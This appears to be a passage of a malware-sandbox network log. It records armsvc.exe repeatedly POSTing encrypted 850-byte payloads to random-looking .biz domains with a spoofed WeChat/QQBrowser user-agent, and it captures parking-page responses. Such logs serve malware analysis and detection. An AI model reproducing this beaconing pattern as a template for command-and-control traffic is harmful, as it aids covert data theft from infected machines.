Dec 13, 2024 15:47:24.628689051 CET	850	OUT	Data Raw: 9f 79 2b 44 9d 1c b1 a7 46 03 00 00 4a b8 2c 7a 2c 97 86 a5 50 8a 04 23 ee 60 88 be 36 88 35 a4 43 98 46 77 cc a3 cc 9e a5 db ee 14 0b 55 e5 11 e0 3e 0c 11 ed 16 8e c8 0c 1a bb 2a ad cd a7 fb 26 7e e2 31 36 07 f5 0c fa 61 e7 28 27 81 d8 2b 3f 02 Data Ascii: y+DFJ,z,P#`65CFwU>*&~16a('+?h-='dS<U,:dU<h@\|gaMN:)MX\|A>.\{)Q4N_+t'kt<o]>$4? ,AgnSIA.&aoy^DRu
Dec 13, 2024 15:47:25.730626106 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 14:47:25 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=3d5405c4c31351bd145a6fdc47bb334d\|8.46.123.189\|1734101245\|1734101245\|0\|1\|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49726	172.234.222.138	80	7384	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 15:47:26.382931948 CET	358	OUT	POST /gtsohqagtapqeyt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 13, 2024 15:47:26.382961988 CET	850	OUT	Data Raw: 3d 4f e4 72 d6 b7 58 56 46 03 00 00 7c c2 e4 db 21 cf e7 6d 2a b7 fa ef 5f 2a 7c 50 70 78 55 b6 6b 0b 44 87 bb 61 91 73 6f 7f 07 18 f3 c8 a7 ee 9c ca 5b cc 88 1f 97 7d 77 a0 b6 5c d6 a6 16 f2 cf fe 2a ea fd fb c2 ed 61 73 99 4b da 52 47 b2 60 86 Data Ascii: =OrXVF\|!m_\|PpxUkDaso[}w\*asKRG`_pVYK)A%\"@ad[VC9b^OU~NcP)SWl'?Ou'}QxRdA1URqiP?LQ_cM~z
Dec 13, 2024 15:47:27.663705111 CET	477	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Fri, 13 Dec 2024 14:47:27 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile Location: http://ww99.przvgke.biz/gtsohqagtapqeyt Cache-Control: no-store, max-age=0 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Dec 13, 2024 15:47:31.261177063 CET	349	OUT	POST /aikqer HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 13, 2024 15:47:31.261177063 CET	850	OUT	Data Raw: 05 1f 7e 0a 5e a9 67 00 46 03 00 00 f8 7e 24 4e 24 16 81 6a 8c 8f 50 89 82 0c 39 f4 69 82 fb e8 d7 78 78 47 8f e0 91 21 66 2a c3 cd 7d e5 8a 48 d8 04 cb 8a 9e dc 99 65 83 0c e2 f8 aa 11 1f 1b 44 05 e8 a4 f1 72 83 e9 43 5b d8 00 1c 3f a1 bc cc b6 Data Ascii: ~^gF~$N$jP9ixxG!f*}HeDrC[?~}Gq5}S(A30wyvIh;g!ixTv9x5#F_q8QXAB~f9ty$@b<usz6HKAcr&yy[Ih.gZd+8%\
Dec 13, 2024 15:47:31.640955925 CET	468	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Fri, 13 Dec 2024 14:47:31 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile Location: http://ww99.przvgke.biz/aikqer Cache-Control: no-store, max-age=0 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49733	72.52.179.174	80	7384	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 15:47:28.019716978 CET	341	OUT	GET /gtsohqagtapqeyt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww99.przvgke.biz
Dec 13, 2024 15:47:29.186801910 CET	289	IN	HTTP/1.1 302 Moved Temporarily Date: Fri, 13 Dec 2024 14:47:29 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Location: http://ww12.przvgke.biz/gtsohqagtapqeyt?usid=23&utid=8062768005 Cache-Control: no-cache Pragma: no-cache Access-Control-Allow-Origin: *
Dec 13, 2024 15:47:31.644562006 CET	332	OUT	GET /aikqer HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww99.przvgke.biz
Dec 13, 2024 15:47:32.011565924 CET	279	IN	HTTP/1.1 302 Moved Temporarily Date: Fri, 13 Dec 2024 14:47:31 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Location: http://ww7.przvgke.biz/aikqer?usid=23&utid=8062768193 Cache-Control: no-cache Pragma: no-cache Access-Control-Allow-Origin: *

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49735	76.223.26.96	80	7384	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 15:47:29.721390963 CET	365	OUT	GET /gtsohqagtapqeyt?usid=23&utid=8062768005 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww12.przvgke.biz
Dec 13, 2024 15:47:31.013452053 CET	825	IN	HTTP/1.1 200 OK Accept-Ch: viewport-width Accept-Ch: dpr Accept-Ch: device-memory Accept-Ch: rtt Accept-Ch: downlink Accept-Ch: ect Accept-Ch: ua Accept-Ch: ua-full-version Accept-Ch: ua-platform Accept-Ch: ua-platform-version Accept-Ch: ua-arch Accept-Ch: ua-model Accept-Ch: ua-mobile Accept-Ch-Lifetime: 30 Content-Type: text/html; charset=UTF-8 Date: Fri, 13 Dec 2024 14:47:30 GMT Server: Caddy Server: nginx Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_DFw0g/zfQDiHvLMVd6Ho/ALkHp0BJVhnSpqPCXekIdQTZ0yh6ko+w1h2N8Mrru3rXI1hhgI7KwtiOcwQynr6wA== X-Domain: przvgke.biz X-Pcrew-Blocked-Reason: X-Pcrew-Ip-Organization: CenturyLink X-Subdomain: ww12 Transfer-Encoding: chunked
Dec 13, 2024 15:47:31.013637066 CET	1236	IN	Data Raw: 33 64 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 Data Ascii: 3dde<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_DFw0g/zfQDiHvLMVd6Ho/ALkHp0BJVhnSpqPCXekIdQTZ0yh6ko+w1h2N8Mrru3rXI1hh
Dec 13, 2024 15:47:31.013727903 CET	1236	IN	Data Raw: 67 69 6e 3a 30 20 30 20 33 70 78 20 32 30 70 78 3b 0a 7d 0a 0a 2e 73 69 74 65 6c 69 6e 6b 48 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 2d 31 35 70 78 20 30 20 31 35 70 78 20 33 35 70 78 3b 0a 7d 0a 0a 23 61 6a 61 78 6c 6f 61 64 65 72 48 6f Data Ascii: gin:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;-moz-border-radiu
Dec 13, 2024 15:47:31.013741970 CET	1236	IN	Data Raw: 3b 0a 7d 0a 0a 2e 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 32 72 65 6d 20 31 72 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 72 65 6d 3b 0a 20 20 20 20 Data Ascii: ;}.footer { color:#626574; padding:2rem 1rem; font-size:.8rem; margin:0 auto; max-width:440px;}.footer a:link,.footer a:visited { color:#626574;}.sale_link_bold a,.sale_link,.sale_link a { color:#626574
Dec 13, 2024 15:47:31.013830900 CET	1236	IN	Data Raw: 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 31 37 2c 20 33 38 2c 20 37 37 29 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 0a Data Ascii: tom: 20px; background-color: rgb(17, 38, 77); text-decoration-line: none; font-size: 18px; font-weight: 700; color: #ffffff; text-align: left;}.fallback-arrow { float: right; width: 24px; height: 24px;
Dec 13, 2024 15:47:31.013851881 CET	612	IN	Data Raw: 68 65 61 64 65 72 22 20 69 64 3d 22 64 6f 6d 61 69 6e 6e 61 6d 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 70 72 7a 76 67 6b 65 2e 62 69 7a 3c 2f 68 31 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: header" id="domainname"> <h1>przvgke.biz</h1> </div> <div class="tcHolder"> <div id="tc"></div> </div> </div> </div> <div class="footer"> 2024
Dec 13, 2024 15:47:31.013863087 CET	1236	IN	Data Raw: 63 6b 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 2f 2f 20 52 65 71 75 69 72 65 64 20 61 6e 64 20 73 74 65 61 64 79 0a 20 20 20 20 20 20 20 20 27 63 6f 6e 74 61 69 6e 65 72 27 3a 20 27 74 63 27 2c 0a 20 20 20 20 20 20 20 20 27 74 79 70 65 27 3a 20 27 Data Ascii: ck = { // Required and steady 'container': 'tc', 'type': 'relatedsearch', 'colorBackground': 'transparent', 'number': 3, // Font-Sizes and Line-Heights 'fontSizeAttribut
Dec 13, 2024 15:47:31.013875961 CET	1236	IN	Data Raw: 20 6c 65 74 20 74 68 65 6d 65 64 61 74 61 3d 27 66 45 4e 73 5a 57 46 75 55 47 56 77 63 47 56 79 62 57 6c 75 64 45 4a 73 59 57 4e 72 66 48 77 31 59 32 55 34 4e 48 78 69 64 57 4e 72 5a 58 51 77 4e 6a 5a 38 66 48 78 38 66 48 77 32 4e 7a 56 6a 4e 44 Data Ascii: let themedata='fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzVjNDkwMmIxZmU3fHx8MTczNDEwMTI1MC43NzY0fDY1YTBiNzZkZjU4MWUwOTRiOGIyOGVkMDUzNDAwNzM2NjYxMjQ2ZjN8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fFpIQXRkR1ZoYldsdWRHVnlibVYwTVR
Dec 13, 2024 15:47:31.013889074 CET	1236	IN	Data Raw: 3a 20 66 61 6c 73 65 2c 27 66 6f 6e 74 46 61 6d 69 6c 79 41 74 74 72 69 62 75 74 69 6f 6e 27 3a 20 27 61 72 69 61 6c 27 2c 27 61 64 4c 6f 61 64 65 64 43 61 6c 6c 62 61 63 6b 27 3a 20 66 75 6e 63 74 69 6f 6e 28 63 6f 6e 74 61 69 6e 65 72 4e 61 6d Data Ascii: : false,'fontFamilyAttribution': 'arial','adLoadedCallback': function(containerName, adsLoaded, isExperimentVariant, callbackOptions) {let data = {containerName: containerName,adsLoaded: adsLoaded,isExperimentVariant: isExperimentVariant,callb
Dec 13, 2024 15:47:31.014030933 CET	1236	IN	Data Raw: 65 72 72 6f 72 5f 63 6f 64 65 29 20 2b 20 22 26 75 69 64 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 75 6e 69 71 75 65 54 72 61 63 6b 69 6e 67 49 44 29 29 3b 69 66 20 28 5b 31 38 2c 20 31 39 5d 2e 69 6e 64 65 78 4f 66 Data Ascii: error_code) + "&uid=" + encodeURIComponent(uniqueTrackingID));if ([18, 19].indexOf(parseInt(status.error_code)) != -1 && fallbackTriggered == false) {fallbackTriggered = true;if (typeof loadFeed === "function") {window.location.href = '//' + l
Dec 13, 2024 15:47:31.133651972 CET	1236	IN	Data Raw: 7d 69 66 20 28 72 65 71 75 65 73 74 41 63 63 65 70 74 65 64 29 20 7b 69 66 20 28 73 74 61 74 75 73 2e 66 65 65 64 29 20 7b 61 6a 61 78 51 75 65 72 79 28 73 63 72 69 70 74 50 61 74 68 20 2b 20 22 2f 74 72 61 63 6b 2e 70 68 70 3f 64 6f 6d 61 69 6e Data Ascii: }if (requestAccepted) {if (status.feed) {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=feed&feed=" + encodeURIComponent(status.feed) + "&uid=" + encodeURIComponent(uniqueTrackingID));}if (status.erro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49748	199.59.243.227	80	7384	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 15:47:32.587976933 CET	355	OUT	GET /aikqer?usid=23&utid=8062768193 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww7.przvgke.biz
Dec 13, 2024 15:47:33.683465958 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 13 Dec 2024 14:47:32 GMT content-type: text/html; charset=utf-8 content-length: 1134 x-request-id: 01960e9b-335b-4191-b18f-01332c5435ce cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Yuhy76xRde+o0qPlFxBlmfX3QoqNGh2kfB5u0vOBoRpAum9meW8tc0RgPEg3onEsOwjf11E+saTO6koGCTzQ1A== set-cookie: parking_session=01960e9b-335b-4191-b18f-01332c5435ce; expires=Fri, 13 Dec 2024 15:02:33 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 59 75 68 79 37 36 78 52 64 65 2b 6f 30 71 50 6c 46 78 42 6c 6d 66 58 33 51 6f 71 4e 47 68 32 6b 66 42 35 75 30 76 4f 42 6f 52 70 41 75 6d 39 6d 65 57 38 74 63 30 52 67 50 45 67 33 6f 6e 45 73 4f 77 6a 66 31 31 45 2b 73 61 54 4f 36 6b 6f 47 43 54 7a 51 31 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Yuhy76xRde+o0qPlFxBlmfX3QoqNGh2kfB5u0vOBoRpAum9meW8tc0RgPEg3onEsOwjf11E+saTO6koGCTzQ1A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Dec 13, 2024 15:47:33.683528900 CET	568	IN	Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDE5NjBlOWItMzM1Yi00MTkxLWIxOGYtMDEzMzJjNTQzNWNlIiwicGFnZV90aW1lIjoxNzM0MTAxMjUzLCJwYWdlX3VybCI6I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49754	18.141.10.107	80	7384	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 15:47:34.761908054 CET	347	OUT	POST /nfm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 13, 2024 15:47:34.762320995 CET	850	OUT	Data Raw: 41 01 2d d2 14 b0 e4 9d 46 03 00 00 2e f6 ba 02 84 f5 6c ae b1 7e a1 f6 14 34 c2 b6 4c 81 01 ba 81 33 f6 d4 0a 36 2a 0a 45 20 b8 d9 95 8b a9 4d ec 7d 9b 56 b0 8f 12 88 16 ae b1 b2 92 33 69 5e a1 2a dc e9 4e ab c8 eb 12 16 86 4c bc 39 af db 91 26 Data Ascii: A-F.l~4L36E M}V3i^NL9&#?v&VMikQw-Ov:(xK=FC,j9:)~a)"z3&9!Y!5;y?N~r0~^7ZirM9+Z)/uoZY<5
Dec 13, 2024 15:47:36.799390078 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 14:47:36 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=5b19481ecd7a21fb7a8656a55b9ba2be\|8.46.123.189\|1734101256\|1734101256\|0\|1\|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49762	82.112.184.197	80	7384	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 15:47:38.584028959 CET	353	OUT	POST /reorqerswtf HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 13, 2024 15:47:38.584057093 CET	850	OUT	Data Raw: c9 6d fe c3 39 f4 23 64 46 03 00 00 37 14 f5 4c aa e0 6f af 45 4a 39 d0 2a f1 8e 3f 8a b7 5a a0 3c ac d4 14 04 41 2a c5 98 7e e8 5f f9 bd c7 74 06 3a 30 ef ae 9b f6 5b 45 03 7d 8c c3 38 75 70 13 3a 59 37 44 c1 a8 ad 5d ee 71 3e be db 93 f3 0d 99 Data Ascii: m9#dF7LoEJ9?Z<A~_t:0[E}8up:Y7D]q>]V^C\|rO43~*7GKueL#?d;Q~I1lPlSFz(\|M_a@Q;C_3T%qx-8!;6p\|#\@uFK!>J:>:,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49811	82.112.184.197	80	7384	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 15:48:00.817935944 CET	350	OUT	POST /lvpmgtiw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 13, 2024 15:48:00.817970991 CET	850	OUT	Data Raw: 65 20 2d be 92 6d 05 2f 46 03 00 00 f7 7b 3b b8 03 b2 90 8a 1d f1 20 74 0e 14 f7 c9 d5 6a 37 8f 9c ee 4f 63 bf 2c c8 2b 3e a0 3d 70 4f 1f f4 cd 56 66 b1 34 a6 be 26 c3 77 56 ef 20 77 ba 27 45 ec a2 b5 85 67 8a f1 9c 4e 70 17 64 29 eb a2 f0 8e 29 Data Ascii: e -m/F{; tj7Oc,+>=pOVf4&wV w'EgNpd))@S;E7>B8~vW~$XVBQjV$_V3w=GX4l{i&ppiAR8=%qroH't'STL{v&O&+K4AV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49866	82.112.184.197	80	7384	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 15:48:23.812203884 CET	352	OUT	POST /glgnfdl HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 13, 2024 15:48:23.812203884 CET	850	OUT	Data Raw: 60 11 0f d4 7d 06 8c 8a 46 03 00 00 58 db 26 35 05 11 31 21 52 d4 fd 5b 7c 98 f7 1a a9 6a b1 28 62 4b 54 e7 71 2d 16 41 76 d3 1c 3e c7 81 3c e1 df 17 0b ac c9 04 87 f0 50 c5 e7 90 b3 e3 fb 76 a7 86 96 10 ba 3b 72 b7 d4 cb 3a 3b 10 a1 d6 9b 42 a4 Data Ascii: `}FX&51!R[\|j(bKTq-Av><Pv;r:;Bl_zrY166d#yW{69ID89b%qA<:y>Ex\..-W&kh@ :y#]i)<?X0F_=9l

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49914	82.112.184.197	80	7384	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 15:48:45.892661095 CET	349	OUT	POST /wjff HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 13, 2024 15:48:45.892661095 CET	850	OUT	Data Raw: 33 f0 03 9a 52 e1 80 6e 46 03 00 00 c4 e8 44 a9 02 04 fc b9 0e 6d b9 2f 81 e2 1f 36 2d f6 9f 64 b8 c5 03 80 45 f1 85 f9 78 bd d7 8d 7a ed bb ef eb af 81 e0 df db 24 f4 04 a4 ff 3b b1 f5 5c e9 02 13 68 ec 1e d2 8b fa 91 bb e1 68 be be 1e b2 78 75 Data Ascii: 3RnFDm/6-dExz$;\hhxuyjI^E?0i)Ye%yTFK/p^FN~9'U'(p@wItn:!`;0)g:;mX{4*x?pK2rD`vlPj5Y7i4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49961	47.129.31.212	80	7384	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
